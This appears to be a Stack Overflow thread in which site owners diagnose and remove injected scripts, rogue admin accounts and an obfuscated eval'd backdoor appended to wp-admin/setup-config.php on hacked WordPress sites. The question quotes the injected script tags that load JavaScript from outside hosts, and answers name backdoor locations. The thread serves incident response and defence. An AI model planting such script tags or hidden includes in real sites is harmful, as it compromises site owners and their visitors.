# Script being injected into the top of all my wordpress page

Tags: wordpress, security, ads

Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:

```
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
```

Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.

What we found so far:

- Some random lines in the function.php that were handling posts /
  gets. We removed those but that didn't seem to solve the issue.
- We found a wordpress user that no one has apparently created. So we removed that.
- Reset all passwords on wordpress and FTP access
- When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?

But we still can't find where or how the script is being injected.

Any help greatly appreciated.

Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au

Comment: Your website has been hacked and your cookies are being stolen. If you're logged in as an admin when you view your site that means that someone else already has access to your wordpress admin. Shut down your site IMMEDIATELY, find the problem, then upgrade all technologies you use, especially wordpress.

Comment: @AndyRay Thanks - we ended up re-building from a fresh copy to ensure we eliminated any issues as it was so well hidden figured they might of plugged some other backdoors in there.

Answer (score 1, accepted):

The same thing happened to a client of mine in the last 24 hours or so.

**Can you share some information about the plugins you use and wordpress version?**

---

The file influencing this is **wp-admin/setup-config.php**. It has *encrypted bash code*. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.

I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.

On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.

> [29-Oct-2015 02:45:59 UTC] PHP Warning:  Cannot modify header information - headers already sent by (output started at **/home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2)** in /home/xxx/public_html/wp-includes/pluggable.php on line 1196

Comment: You sir are my hero! Had to scroll to end of the wp-admin/setup-config.php file and sure enough there it was.

Version of wordpress was slightly older version 4.2x something. No idea how they managed to inject it in though.

Comment: My client has version 4.2.5 and it seems that it might be a WP vulnerability. I can't see how any of his plugins could cause this kind of breach.

Obviously, we should update to latest version. And plugins should be also updated, always.

Comment: Please email all information you have to security@wordpress.com ASAP https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/

Comment: @AndyRay Thanks - have emailed it

Comment: BTW wp-config.php is also edited to include wp-admin/setup-config.php.

Answer (score 1):

Try to narrow down the injection source.

1. Disable plugins one at a time
2. Switch to a different theme
3. Check .htaccess files
4. Test against server generated injections
5. Test against browser generated injections

Comment: Thanks, how would I go about doing 4 & 5?

Comment: 4-> Move the wordpress app to a different server, and edit your hosts file to point to it. 5-> Use a different browser

Comment: Thanks tried these. Now trying fresh installs for core & plugins while running wordfence. Fingers crossed...

Answer (score 0):

had the same issue few hours ago. 
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok. 
But how the hell somebody could control index.pho I don't know....